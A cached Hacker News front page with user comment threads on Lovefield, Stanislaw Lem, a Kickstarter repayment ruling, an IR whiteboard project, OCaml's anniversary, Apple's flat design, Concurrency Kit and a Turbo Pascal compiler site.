Would be interesting to compare it to AlaSQL (https://github.com/agershun/alasql).
emmanueloga_ 2 days ago 0 replies      
The API style looks very similar to JOOQ's.

1: http://www.jooq.org/doc/3.6/manual/sql-building/sql-statemen...

jpgvm 2 days ago 0 replies      
The whole saga is very sad. WebSQL was the right move all along. NoSQL turned out to be a fad and people really just want to use SQL to build real apps. Especially newbies: learning SQL is a lot easier than learning how to reimplement its features on top of a document store.
dom96 3 days ago 0 replies      
Lovefield is still relatively new and immature. When I tried to use it I ran into some strange errors. The situation might have improved now but I personally would still recommend PouchDB instead.
nnq 3 days ago 0 replies      
Niiice... last time I tried to get something done with IndexedDB it was a total PITA. If this manages to take away even 20% of IndexedDB's pain, it's sure worth taking a look at!
wener 3 days ago 1 reply      
I'm not a web developer, but this looks great. I want to learn how SQL things work; maybe this is a good start for a beginner? BTW, the speaker's face is too serious.
dvh 3 days ago 1 reply      
Then why did they kill WebSQL in Chrome packaged apps?
pvaldes 2 days ago 0 replies      
wow, the landing page of this site is really fast...
moron4hire 3 days ago 0 replies      
Why Stanislaw Lem's futurism deserves attention nautil.us
192 points by pmcpinto  3 days ago   64 comments top 14
Pamar 3 days ago 1 reply      
The result is a disconcerting paradox, which Lem expresses early in the book: To maintain control of our own fate, we must yield our agency to minds exponentially more powerful than our own, created through processes we cannot entirely understand, and hence potentially unknowable to us.

This sentence (and the ones that precede and culminate in this one) made me think of Iain Banks's Culture.

terhechte 3 days ago 4 replies      
Interestingly, in his book 'Golem XIV' [1] Lem creates an actual example scenario of a future where mankind managed to create an AI far superior to us, only to find that said AI is not even remotely interested in playing war games for military generals and instead just holds long lectures about humanity. So it is a bit like a simplified, more approachable version of the 'Summa Technologiae' mentioned in the article. I recommend that book; it is a great read.

[1] https://en.wikipedia.org/wiki/Golem_XIV

chiph 3 days ago 1 reply      
I think we'll be fine, as long as we don't build a machine that can create anything as long as it starts with the letter 'N'

Reference: https://books.google.com/books?id=kWElP9YZkzQC&pg=PA3&lpg=PA...

pjscott 3 days ago 1 reply      
How useful would a superintelligent computer be if it was submerged by storm surges from rising seas or disconnected from a steady supply of electricity?

How useful would Elon Musk be if he were submerged by storm surges from rising seas or disconnected from a steady supply of food?

Put that way, the question sounds pretty silly: he's rich enough to buy food even if it gets expensive, and if the ocean ever got too frisky he would simply avoid standing next to it. Any superintelligent AI worthy of its lofty title could get a lot of cash; mere humans manage that sort of thing all the time. Why even mention such minor inconveniences?

ommunist 3 days ago 2 replies      
Stanislaw Lem imho is one of the most accurate futurologists. Drone armies, spaceflight psychological problems, he had it all, and his Futurological Congress is also hilarious.
maligree 3 days ago 1 reply      
There's also a fantastic 7-minute film based on the dark wisdom of Golem XIV. You should really, really watch it:


beatpanda 3 days ago 2 replies      
More than once I have wondered why so many high technologists are more concerned by as-yet-nonexistent threats than the much more mundane and all-too-real ones literally right before their eyes.

Yeah, for a group of people who hold themselves out to be so very intelligent there does seem to be a blind spot about ten miles wide.

And before you say it, you're going to have to provide some proof of the oft-repeated notion that goes something like "Uber-for-dogwalkers is going to accidentally provide the solution to climate change." Simply believing so isn't enough.

sjclemmy 2 days ago 1 reply      
What appears to be the central theme of this article is the idea of transformation, which is an idea as old as the human species.

It seems to me that central to our psyche is a desire to transcend our current existence and replace it with a new one. This idea is expressed all over the place in our cultures; reincarnation, living in space, life after death, or, on a more mundane level 'bettering oneself' through personal transformation. The author says that Lem was 'seduced' by this idea and expressed it as the notion of 'indomitable human spirit'. It is indeed a terribly seductive idea, not least because of the effect it has on how we feel.

paddyzab 2 days ago 1 reply      
There is one book by Lem, one of my favourites, which was never translated to English: https://en.wikipedia.org/wiki/Observation_on_the_Spot

In which he describes a variant of reality where a civilisation engineers a security sphere over reality (called etykosfera - a sphere of ethics, with nanobots called Bystry), which prevents beings from hurting themselves in any way.

He explores social consequences of such security layer.

Amazing book.

alex_young 3 days ago 3 replies      
Sadly unmentioned is Lem's quite dystopian post-apocalyptic work, "Memoirs Found in a Bathtub", a future defined by mega-McCarthyism and the pursuit of any fragment of 'truth', however slimly defined that may be.

Worth a read.

forscha 2 days ago 0 replies      
I wonder what the author of the article could do if he 1) got into the habit of keeping it concise 2) used 2-syllable words instead of 5-syllable words when reasonable.

With the rise of the web and a less-empty life than I once had, I don't have the patience to work through verbiage for uncertain payoff, even when the topic is a book that I'm already aware of and looking forward to reading.

ajuc 2 days ago 0 replies      
Lem was the most obviously brilliant author that I've read.

I still can't manage some of his serious books (Solaris was OK, but Fiasco was too boring for me). But the Cyberiada is just too great.

I've tried reading Summa Technologiae when I was a teen, and dismissed it as I dismissed all philosophy at the time, should probably try again.

novalis78 3 days ago 0 replies      
Lem's language is so very powerful - some of the vivid imagery of his books (which I read as a young teenager) still haunts me to this day. Especially his ability to depict "alien" worlds/concepts that seem so close on the one hand but then continuously elude deeper comprehension and leave you wondering and in awe.
acconrad 3 days ago 1 reply      
The title made me think this was going to be about TAOCP or Godel Escher Bach.
State court orders Kickstarted game creator to pay $54k for failing to deliver gamasutra.com
155 points by Impossible  2 days ago   94 comments top 12
ghayes 2 days ago 4 replies      
There are risks involved in a Kickstarter. I'm sure these are spelled out in the terms and conditions of funding a Kickstarter. While backers should be protected from fraud, a good-hearted attempt that fails should be covered by that contract, in my opinion.
seesomesense 2 days ago 0 replies      
Asylum Playing Cards were a long-running scam. Good to see that the Attorney General's office finally went after them.
equil 2 days ago 1 reply      
Ever since that Hanfree story [0], Kickstarter has been a bit more explicit about creator obligations [1]. Creators are now told to "make every reasonable effort to find another way of bringing the project to the best possible conclusion for backers" should the project fail or rewards not make it to backers. The terms of use also have an explicit warning about possible legal action at the bottom.

[0] http://www.businessinsider.com/how-one-stupid-mistake-and-35...

[1] https://www.kickstarter.com/terms-of-use#backer-creator

746F7475 1 day ago 1 reply      
It was only a matter of time before something like this happened. In the best case there will be fewer bad Kickstarters and scams; in the worst case, kickstarting will become a thing of the past. Unless you are 100% sure you can deliver the product, you risk having to pay back everything.
hathym 1 day ago 0 replies      
All they need is another Kickstarter campaign to pay for the legal fees :D
joesmo 1 day ago 0 replies      
Always set up an LLC or corporation before doing any kind of business that could involve such liabilities. The $500-$1000 it costs to do that is obviously money well spent, but most people don't realize that till they're facing bankruptcy. Think of it like health insurance for your business: if you don't have it and something goes wrong, you're fucked. Then again, lots of people who could afford to pay skimp on health insurance and put themselves at risk of bankruptcy every single day, so it does take a little bit of awareness of reality.
bentrevor 2 days ago 2 replies      
Does double jeopardy apply here? As in, can another state sue for the same thing?
fapjacks 1 day ago 0 replies      
AWESOME. Awesome! That's all I can say. I'm SO glad to see this happen. It will go a long way to reassure nervous backers to back interesting projects and to stop thieves and scammers like the hilariously-fake Bleen[0].

[0]: https://www.indiegogo.com/projects/bleen-3d-without-glasses

javajosh 2 days ago 7 replies      
Cacti 1 day ago 2 replies      
smegel 2 days ago 0 replies      
gadrfgaesgysd 2 days ago 9 replies      
Dry erase board lined with IR sensors to record pen strokes [video] youtube.com
195 points by arey_abhishek  2 days ago   64 comments top 21
jwcacces 2 days ago 2 replies      
My high school had these in 1995. Each marker color had a different reflective pattern on a band around the tip so the scanning laser could read it like a bar code. I remember the eraser having a solid reflective band all the way around. It was pretty cool, as we all got whiteboard "transcripts" emailed to us at the end of the class that you could play back / pause / rewind / etc... whenever you wanted.

Also, these boards had no projectors (they used real ink in the markers) and didn't require special markers (just the barcoded pen collars, which were removable)

arey_abhishek 2 days ago 2 replies      
OP here. If you'd like to see a kickstarter project out of this, please upvote this comment!
natch 1 day ago 1 reply      
Please don't listen to all the naysayers (I was about to be one of them) who are saying this has "already been done." Sure, they are right. But is there one in every room of every office? No. But there could be.

The thing that has changed between when this stuff was first done and now is that everybody has smartphones. The old dinosaur systems aren't priced to take this into account.

tsangk 2 days ago 2 replies      
If you are interested in a full commercial version of this (sharing an analog whiteboard with a link), check out http://smartkapp.com

(Disclosure: Am employee of said company)

raldi 2 days ago 2 replies      
This is cool as a DIY project, but digital whiteboards have been around since at least 1991:https://en.wikipedia.org/wiki/Smart_Board
joezydeco 2 days ago 1 reply      
One tip from someone that has worked with IR emitters/detectors: make sure your product can handle direct and reflected sunlight.

I'd hate to see you getting all the way through a kickstarter and then finding out you need to rework your frame to reject ambient and stray IR.
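For reference, the usual trick for rejecting ambient and stray IR is to pulse the emitter and sample the detector both with the emitter off and on, keeping only the difference; steady sunlight then cancels out of the subtraction. A minimal sketch of that differential step (the reading values, the threshold, and the beam-break framing are assumptions for illustration, not details from the video):

```c
#include <stdbool.h>
#include <stdint.h>

/* Differential IR detection: sample the photodiode with the emitter
   off (ambient only) and then on (ambient + beam), and threshold the
   difference. Constant ambient light cancels out of the subtraction. */
bool beam_interrupted(uint16_t raw_on, uint16_t raw_off, uint16_t threshold)
{
    /* Guard against the off-sample exceeding the on-sample
       (sensor noise); treat that as no received signal. */
    uint16_t diff = raw_on > raw_off ? (uint16_t)(raw_on - raw_off) : 0;

    /* A weak differential signal means a pen or eraser is
       blocking the beam between emitter and detector. */
    return diff < threshold;
}
```

The emitter pulsing itself would live in a timer/ADC loop on the microcontroller; the point is that only the on/off difference ever reaches the touch-detection logic.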

liamuk 1 day ago 1 reply      
Here's a poor man's version that uses <$50 of hardware (a Wii remote and an IR LED).

If anyone's interested in playing around with it I'll put up some nicer usage instructions



27182818284 2 days ago 1 reply      
Fairly neat. Consider the listing status of the video. Right now it is discouraging people from sharing.
OliverJones 1 day ago 1 reply      
Virtual Ink, anyone? http://www.mimio.com/en-NA.aspx Think about how much fun it will be to try to sell expensive stuff to schools and colleges before you raise a lot of money for this.
deutronium 1 day ago 0 replies      
Out of interest, I was looking at one of the IR touchscreen frames you linked to.

The control boards seem to vary in terms of the number of touch points they can monitor.

So I'm wondering how you distinguish between a marker pen and the larger whiteboard eraser.

Is it possible to access the raw output from the IR sensors, I wonder?

langseth 2 days ago 1 reply      
Is this working on a similar system to optical touchscreen technology? Did you build the IR sensors into the edge of the glass or at the surface?


Milner08 1 day ago 0 replies      
I remember my dad having something very similar in his office when I was a kid. You could write on it like a normal white board then it would print out a copy of it for you.
ohitsdom 2 days ago 2 replies      
Really impressive. Must be pretty sensitive IR sensors to not have false detections when the marker/eraser gets close to the board but doesn't touch it. Any info on the hardware and software stack?
bobosha 2 days ago 2 replies      
Couldn't we have a webcam to stream/record the video? Or perhaps capture snapshots? If needed we might subtract the human from the video stream using some basic machine vision techniques.
MichaelApproved 2 days ago 0 replies      
Looked like it was zoomed in on the written part. I wonder if it would gradually zoom out, as you write more, or if you could scroll around on the display to see the rest of the writing.
smurlidhar 2 days ago 0 replies      
Hey arey_abhishek, I am an investor and have been looking to invest in a product like this! Let's talk! DM me @sidsays on Twitter.
hoopism 2 days ago 0 replies      
Very cool DIY project.

Without details of price or advantage over existing tech I don't see it as a fundable/kickstartable effort... but good luck.

mmastrac 2 days ago 0 replies      
Impressive. What platform did you build this on?
DiabloD3 2 days ago 0 replies      
gotrythis 2 days ago 0 replies      
I want one. Seems like you're saying we can't buy it currently?
skynetv2 2 days ago 2 replies      
OCaml's 20th Anniversary inria.fr
163 points by amirmc  1 day ago   31 comments top 4
fermigier 1 day ago 1 reply      
Congratulations to my friends Xavier Leroy and Damien Doligez, as well as to all the other contributors to OCaml.

For those interested in learning OCaml from a MOOC, there is one starting soon (next month). You can already register here: https://www.france-universite-numerique-mooc.fr/courses/pari...

Note: the MOOC is delivered on a French MOOC platform but will be in English.

eatonphil 1 day ago 4 replies      
I got really excited reading the 1995 email as an announcement that INRIA was releasing a new SML-based language. The association I can't get out of my head is: SML is to C as OCaml is to C++. This is backed (to some degree) even in this email:

 > ... in 20 years, the language picked up many language features that were open research problems in 1995, such as objects and classes with type inference, polymorphic variants, first-class polymorphism, and first-class modules.

SML is a much simpler language and I think a solid SML kernel with a good (read: modern, web-friendly) standard library targeting LLVM or the JVM could be a real winner for commercial use.

xvilka 1 day ago 0 replies      
One of the biggest problems now is the lack of Windows support for opam [1].

I hope that will be solved in the near future, because currently Microsoft is trying to take that niche with F#.

[1] https://github.com/ocaml/opam/issues/246

quantumtremor 1 day ago 5 replies      
I know Clojure, and am looking to learn a statically typed functional language. I've narrowed it down to Haskell and OCaml (are there others I should know about?).

I still am unsure what OCaml is good for. E.g., Ruby is good for webdev with Rails, Python is good as a general-purpose language, Clojure is good for async and quick iteration/integrating with Java code, C is good for OS work, C++ is good for native applications.

Is OCaml general purpose? Can I use it for NLP? Statistics? Numpy-like n-d array math? Writing a compiler?

Destroying Apple's Legacy cheerfulsw.com
183 points by milen  2 days ago   130 comments top 26
epistasis 2 days ago 10 replies      
I have found the flat design incredibly difficult to use.

In particular, the new Apple Music app was almost completely undiscoverable for me. It wasn't until I was reading patch notes that I realized it had a key feature I had been searching the UI for, for more than a month. That feature was to show only the music available offline, and it's hidden behind a down arrow next to a heading label (rather than the ... that other menus have).

Apple has never been perfect at UIs, but they've always been better than this in my experience. Deciding to hide key information and be as cryptic as possible works great for designers that already know the UI, but it works terribly for users that are still learning it. This type of elementary mistake, all too common by those who are deep in the act of creation, is best corrected by stepping back from the problem and approaching everything with the mind of a beginner. That or giving the device to an outsider and observing them, good old fashioned trials.

That's what UX needs these days, not more fashionistas trying to remove data and UI cues. The industry needs a big wakeup call. Mobile and even the web (like Google Docs) are becoming a churn of bad experience.

matthewmacleod 2 days ago 2 replies      
Bit over-the-top I think, with some misleading statements.

Apple still publish the HIG. See the iOS version here: https://developer.apple.com/library/ios/documentation/UserEx...

Contrary to what the article says, it does explain why various UI elements are designed as they are, not just as thoughtless promotion of aesthetics over interaction.

I think people often fall back on 'nobody thought about this and it's rubbish' arguments when the reality is often closer to 'they changed this and I don't like it'. The latter is a totally valid complaint, but it's also qualitatively different.

In my personal experience, I've not seen computer-naïve users of iOS struggle to a greater degree with iOS 7+ than with any of the previous versions. YMMV of course, but I think the extent to which it's a problem is overstated.

There are a couple of exceptions, of course: the Reminders app has some stupid UI decisions that irritate me. But what software doesn't? How about that floating 'create a new document' button that was in Google Docs/Sheets/etc. until recently? Every single time I opened it, I had to hunt around for the button to create a new document because it wasn't where I expected it to be. But that doesn't mean Material is awful; it just means that it's a complex, long-term challenge to create a consistent UI applicable to a wide variety of applications. And I don't think modern UX is all that bad.

astrodust 2 days ago 3 replies      
"Apple used to lead the world in interface design" does not mean their designs were without serious flaws. Nobody would get up and defend System 7 as the pinnacle of usability; it was downright quirky and strange in places, and by the time System 9 arrived it'd gotten downright surreal. Things only made sense in the context of history.

The difference between Apple and other companies is not that Apple gets it right every time, but that Apple genuinely tries. Some other companies literally do not care how their products look, they just ship whatever the engineering team cobbles together with snippets from Google Image Search.

Microsoft's making similar efforts lately, so that's encouraging to see, and even Google is making strides in reducing the amount of rampant ugly in their applications.

gok 2 days ago 2 replies      
The leading complaints about the "Edit Alarm" screen are kinda weird... unless "Apple's new direction" means Apple's new direction post-2006.

The new: https://unicornfree.com/wp-content/uploads/2015/09/IMG_7374....
The old: http://i1-news.softpedia-static.com/images/news2/Apple-iOS-S...

There was always a "time-wasting dial." The labels were always "styled with more visual impact than the actual data." All four different types of data elements were always "styled the same, with the same visual weight."

Pxtl 2 days ago 2 replies      
Imho, the problem is that flat design is intensely restrictive. Suddenly things that used to be available to freely design with have become UI cues... the designer can no longer play with color and layout and let the buttons stand out by button-bevel and the like... now the color and layout are part of the UI language.

Apple, being a design-oriented company, can't keep fiddling with individual app layouts, which means they can't work within the hyper-restrictive design language of flat.

Microsoft actually does much better with flat, I find, because I think there are fewer cooks in the "design" kitchen there.

guelo 2 days ago 1 reply      
I've had conclusive data that a 3D-looking button was converting significantly better but have been overruled because of the "sleek", "clean" bullshit that passes for design these days.
akamaka 2 days ago 1 reply      
It's funny to read this, because I personally find iOS to have by far the best UI of any mobile OS, and I consider the flat design of iOS7 to be a big step forward.

Other people feel differently, and they consider Android superior, so clearly there is a difference in taste.

The conundrum is that nobody seems to be able to clearly articulate why this is, and this article doesn't really help. For example, it says the timepicker is "awkward, time-wasting, inaccurate". Compared to what? Has anyone been able to measure how much time it wastes and how inaccurate it is?

In the end, this article takes a thousand words to say little more than "This doesn't feel quite right to me", and doesn't reveal any root causes. Do people prefer different UIs because of differences in finger size, manual dexterity, visual attention? Does Apple's UI cater to a specific minority of users? Do biological differences make it impossible to satisfy everyone?

kps 2 days ago 0 replies      

 > Minimalism in software is achieved by simplifying feature sets,
 > not stripping away pixels.

Simplifying feature sets should not mean reducing functionality. That is the lazy way. Simplicity should remove the extraneous, redundant, and inefficient; functionality is not that. Functionality with simplicity requires things like generality, orthogonality, composability....

Good software engineers eventually learn to be able to do this for the code they produce (whether the business case allows it is a separate question). It should be possible for good UI designers to do likewise.


Edit: I am not disagreeing with the article author here:

 > It's not minimalism to rip away the very things your users need.

hyperion2010 2 days ago 1 reply      
A lingering question of mine: "Has anyone _actually_ done UI research since the 70s or are all these 'innovations' just bullshit?"
nemo44x 2 days ago 0 replies      
Not that Apple has perfect UI's (The clock dial is awful) but I feel like the ideas expressed in this article are that a UI should be designed as if the user is always using it for the first time. And that simply isn't true. With such a small screen a lot of things need to be considered, such as how easy is it to press a button without moving the hand and if this means sacrificing some natural ease of use - so be it. The user will still quickly learn how the UI works and adapt quickly.
kitsunesoba 1 day ago 0 replies      
While the old iOS look was getting a little cheesy by the time iOS 6 rolled around, it was indeed very clear for the most part. Wooden bookshelves in iBooks might not have had much function, but the shading and glassy look on controls certainly did.

As an example, coming from the angle of an individual who'd never approached a smartphone in his life, the function of the iOS 6 picker/spinner was immediately obvious. The shading and glassy highlights made it look like a real spinner and practically begged the user to interact with it. Distinct section separators made it perfectly clear that each section can be spun separately.

Compare this to the picker in iOS 7 and up. Not only is there no shading or highlights to suggest how to interact with it, but now there are no separators; even if one presumes that it can be spun, it looks like the whole thing would spin. To make things worse, oddly skeuomorphic 3D perspective has been added into the mix, presumably to try to suggest spinnability, but without partner cues it's just confusing. With this design, so much is left unknown until the user attempts interaction.

Reference screenshot: http://blog.ittybittyapps.com/images/posts/lifting-the-lid-o...

I personally feel that Apple struck a nice balance between design modesty, usability, and aesthetics with Mavericks desktop, but that's gone with Yosemite. Interestingly though, El Capitan adds in subtle hints of shading and depth in a few places. I wonder if we'll see things start to tilt back in the other direction with OS X 10.12 and iOS 10.

lips 2 days ago 0 replies      
Here's a secret. Apple has never designed truly wonderful user interaction. But they have been unafraid to say "no," less horrible than most others, and opinionated. These discussions don't benefit from a false narrative of them falling from a grace they never held. (Mac owner from plus to pad)
Shivetya 2 days ago 0 replies      
The dramatic loss of color and warmth when the new look came about took me back to the days when I had a PS/2 50z with the VGA gray-scale monitor. While everything can look well defined, it does at times look a little too stark; if software could have a dystopian air to it compared to what came before, they did well.
rsp1984 2 days ago 1 reply      
I could not agree more with this article. Human brains are hard-wired to infer 3D structure from shading. Taking away shading means taking away 3D structure, means taking away one of the most important visual cues there is to help humans grasp interfaces.

Also, coming from print media, human brains are conditioned to detect and separate important/immediate from unimportant/less-immediate content by looking at overall page structure and relative weights. Deciding against bold or large fonts for the looks takes that away too.

Finally, there is a ton of research pointing to the fact that fonts with a healthy amount of thickness are easier to read than thin fonts. The debate is still on about serifed fonts, I guess, but using Light Helvetica for kind of everything quite certainly is a step in the wrong direction.

Bartweiss 2 days ago 2 replies      
At this point, a lot of decisions that were once skeuomorphic are now a matter of tradition and user expectation. For a whole generation, the image of a floppy means "save" not because of its physical history but because that's the icon everyone else uses for "save".

Abandoning choices like "button means clickable" and "colored and underlined means link" isn't just a move to flat design, it's an attempt to retrain users on software conventions that have transcended their physical origins.

ovatsug25 2 days ago 0 replies      
My company does a lot of paperwork. It turns out people want to work on something that looks like "paper" or the final printed-out result. The idea of an interface with buttons may be commonplace to us, but there are many people for whom it is equally foreign.
DasIch 2 days ago 0 replies      
> There was never any evidence that a few decorative pixels hurt the user.

Is there any evidence that removing them does?

> The HIG wasn't about aesthetics, it was about interaction.

> It was based on research, not trends.

It's not about interaction now? It's not about research now? In which ways isn't it?

I believe skeuomorphism is just about aesthetics and trends. Well, actually I don't; I'm not sure what I should think. I'm not aware of any research and can't make a good argument either way. Unlike the author, I don't pretend I can, though.

There might be a problem, or it might just be a figment of the author's imagination. In either case, articles like this one certainly are a problem.

zeveb 2 days ago 1 reply      
Great, and true, article. But interestingly, he's guilty of a similar thing: his CSS makes it impossible to tell visited vs. never-visited links.
amelius 2 days ago 7 replies      
> ... has produced some of the best industrial design in the history of consumer products.

Like the completely non-ergonomic, design-over-function, keyboards?

devy 2 days ago 0 replies      
"so apple legal call was not a threat. it was a request. b.c. jony ive was personally offended by our soundboard. what world do i live in?"[1] - by the author Amy Hoy

[1]: https://twitter.com/amyhoy/status/642446087802982400

draw_down 2 days ago 0 replies      
Yes, they are doomed. Doomed!!
joesmo 2 days ago 0 replies      
Once a UI design is perfected, as is often the case, companies continue to look for ways to change it simply for the sake of changing it, and so they can announce something new. This is true of both Apple and Google in the mobile phone space. Every single time, the new UI is worse because it hasn't been tested and no designer can think of everything. There was nothing wrong with UIs before the flat design. Flat design didn't solve anything. But once Apple implemented it, everyone had to have it. If you don't have it, your app is not "slick" and "cool." And yes, those subjective qualities matter way more than the quality of your app or really, anything else.
Silhouette 2 days ago 0 replies      
Oh, man, I have never wished so much that I could upvote a submission more than once. I wish this article could be pinned at the top of every discussion site used by web and app designers for the next... forever.

The only thing in the design world that I find more infuriating than the current trends, and the accompanying blandness and usability issues, is when people try to justify those trends as being somehow superior to what we had before using the worst kind of retro-fitted mumbo jumbo. At least let's be honest that most places have adopted flat design because it's cheap, easy, and quick.

At the bottom end of the market, making UIs a commodity is in itself no bad thing. For web applications, you can implement flat design in pure CSS, cutting down the bandwidth required for images. More generally, typical flat design elements are nicely scalable and Retina-ready, because everything is all done with such trivial vector graphics that no real effort or creativity is needed. You can adapt the simple layouts more easily to small screens as well. In fact, why develop anything original or even hire anyone with design skills at all, when you can just slap Bootstrap on it and charge the client an extra 200% for making the site responsive?

Unfortunately, for anything above the bottom end of the market, and particularly for promoting UIs that offer better usability and/or more distinctive styles, the current trends are awful for all the reasons this article sets out.

happyscrappy 2 days ago 4 replies      
Not that Google has a legacy of great design, but don't all these points apply to Material as well?
gress 2 days ago 0 replies      
The author wasn't around when MacOS was new, otherwise she'd remember that the things she thinks are obvious are just conventions that people had to learn. Easier than a CLI, but something to learn just the same.
vinceguidry 2 days ago 1 reply      
Concurrency Kit: Concurrency primitives and non-blocking data structures in C concurrencykit.org
137 points by misframer  1 day ago   15 comments top 6
reza_n 10 hours ago 1 reply      
It seems like a lot of these data structs are not thread-safe. Other than ck_bitmap, which seems to be read/write thread-safe, ck_array, ck_hs, ck_ht, and parts of ck_ring only allow a single writer in the presence of many readers. Did I misread something here? Still a lot of good stuff here, but not sure if these data structures can be used without external locking.
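The single-writer cases described in the comment above are a design point rather than a defect: with exactly one producer and one consumer, a ring buffer needs no locks at all, only acquire/release ordering on the two indices. The sketch below is a generic C11 illustration of that pattern; it is not ck_ring's actual API, and names like `spsc_ring` are made up here.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

#define RING_SIZE 8  /* must be a power of two for the index mask */

struct spsc_ring {
    _Atomic size_t head;       /* advanced only by the consumer */
    _Atomic size_t tail;       /* advanced only by the producer */
    int slots[RING_SIZE];
};

/* Producer side: since no other thread writes tail, the slot write
   can be plain; the release store publishes it to the consumer. */
bool ring_enqueue(struct spsc_ring *r, int v)
{
    size_t tail = atomic_load_explicit(&r->tail, memory_order_relaxed);
    size_t head = atomic_load_explicit(&r->head, memory_order_acquire);
    if (tail - head == RING_SIZE)
        return false;                        /* full */
    r->slots[tail & (RING_SIZE - 1)] = v;
    atomic_store_explicit(&r->tail, tail + 1, memory_order_release);
    return true;
}

/* Consumer side: the acquire load of tail makes the slot write
   published by the producer visible before it is read. */
bool ring_dequeue(struct spsc_ring *r, int *v)
{
    size_t head = atomic_load_explicit(&r->head, memory_order_relaxed);
    size_t tail = atomic_load_explicit(&r->tail, memory_order_acquire);
    if (head == tail)
        return false;                        /* empty */
    *v = r->slots[head & (RING_SIZE - 1)];
    atomic_store_explicit(&r->head, head + 1, memory_order_release);
    return true;
}
```

The single-writer restriction is exactly what makes the `tail` store safe without a lock: it never races with another writer. Supporting multiple concurrent writers is what forces the heavier compare-and-swap machinery (or external locking).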
virmundi 1 day ago 3 replies      
How does this compare to OpenMP? I just started learning about this in my HTC course.
mingodad 16 hours ago 0 replies      
I looked at this library in the past and I could not find any usage of it in any open source project. That made me a bit wary: how is a library like this, with its supposedly well-thought-out construction, not used anywhere?
Jweb_Guru 1 day ago 0 replies      
I have nothing but praise for this library... it's a great resource for writing high-performance parallel programs.
Keyframe 23 hours ago 1 reply      
OK, but where do I start?

PS I may be dense today.

gadrfgaesgysd 1 day ago 3 replies      
Internals of a Turbo Pascal Compiler turbopascal.org
134 points by agumonkey  2 days ago   104 comments top 8
barrkel 2 days ago 6 replies      
This site doesn't describe the internals of Borland's Turbo Pascal compiler. It describes a compiler written in Turbo Pascal that can compile some subset of Turbo Pascal's language.

Borland's Turbo Pascal compiler was written in 16-bit x86 assembly, mostly by Anders Hejlsberg.

There is an explanation of this on the front page of the site, but it's not clear from the headline.

(I used to work at Borland on the Delphi compiler, and had access to the source of tpc.exe.)

pjmlp 2 days ago 3 replies      
I loved Turbo Pascal.

When I got to learn C, I already had Turbo Pascal 3, 4, 5.5 and 6.0 in my toolbox.

Compared with Turbo Pascal, the only thing C had going for it was being available on other systems. Everything else was meh.

No safe memory handling, no bounds checking, no units (modules), no namespacing, no proper strings, no OOP support, arrays decaying into pointers, no type-safe enumerations, no sets, no generic array indexes...

At least C++ allowed me to get some of those Turbo Pascal features back.
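One item on that list, arrays decaying into pointers, is easy to demonstrate: the moment an array is passed to a C function, its length is gone, whereas a Turbo Pascal array parameter kept its bounds and could be range-checked. A small sketch:

```c
#include <stddef.h>

/* The parameter is declared int a[10], but C silently rewrites it
   to int *a: the callee sees only a pointer, never the length. */
size_t decayed_size(int a[10])
{
    (void)a;                    /* parameter unused except for sizeof */
    return sizeof a;            /* sizeof(int *), not sizeof(int[10]) */
}

size_t declared_size(void)
{
    int a[10];
    return sizeof a;            /* 10 * sizeof(int): not yet decayed */
}
```

This is why C bounds checking has to be done by hand (or by passing the length separately), while a Pascal compiler could insert range checks automatically.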

Udo 2 days ago 1 reply      
Turbo Pascal was my first contact with compiled languages in school, after starting off with Commodore Basic as a kid and graduating to Amos and some other Amiga stuff later. TP was my first contact with real PCs, too. After school I moved to Delphi, which was basically a thin wrapper around the Win32 API with Object Pascal syntax and the nicest IDE I had ever used (and probably will ever use).

Delphi really paid my bills as a newbie commercial programmer. That was around the time when the internet took off, and I wrote my first CGI servers in Pascal to make dynamic websites. The Pascal/Delphi language and environment were incredibly versatile and you could write some really fast code with it.

Fond memories. In many ways, TP leveled me up as a programmer.

rottyguy 2 days ago 2 replies      
I was working at a software store during the mid-to-late 80's (Babbage's, if anyone knows it) and had a customer come in asking for a small, lightweight editor... you know, like "Turbo Pascal but w/o the compiler part". First time I ever heard of it and, tbh, had no idea what he was talking about. I later used it to do some work for my CS class (high school was teaching programming via Pascal). It's a good language to learn after BASIC and before C/C++.

IIRC, TP used a yellow font (well, ASCII) on a black background (default)? Didn't it also have some quick key combinations? (I recall a Ctrl+K for some reason, but I'm sure it's just memory...)

junto 2 days ago 1 reply      
Turbo Pascal was the first language I was taught in school, although I had already taught myself BASIC on a BBC B Microcomputer as a child.

I loved Pascal and wrote a race management program for my local sailing club when I was 16. Fond memories. The whole experience was a voyage of discovery, as I had to write my own "windows" style UI using ASCII codes.

I used Delphi later on in university, along with Modula-2 and C++. I never felt the same passion for these languages as I had had for Turbo Pascal.

I later moved on to VB and VBscript, and didn't like them at all but they paid the bills.

The next time I felt that same type of passion was for C#. Somehow it just clicked. I think it is about what you can achieve productively with the language, as well as the language itself.

huhtenberg 2 days ago 1 reply      
> Anders Hejlsberg developed Blue Label Pascal... This compiler was later licensed by a software company Borland which added user interface and editor, changed the name to Turbo Pascal and offered it for a competitive price.

Nooo... Another account of TP origins was that it was written by Philippe Kahn (the founder of Borland), back when he was just a one-man operation running from a small office on top of a Jaguar car service shop. But apparently it wasn't. Damn.

swaits 2 days ago 1 reply      
Fans of Turbo Pascal, or more so Delphi, will be interested in Lazarus. http://www.lazarus-ide.org/
mahouse 2 days ago 1 reply      
       cached 14 September 2015 02:11:02 GMT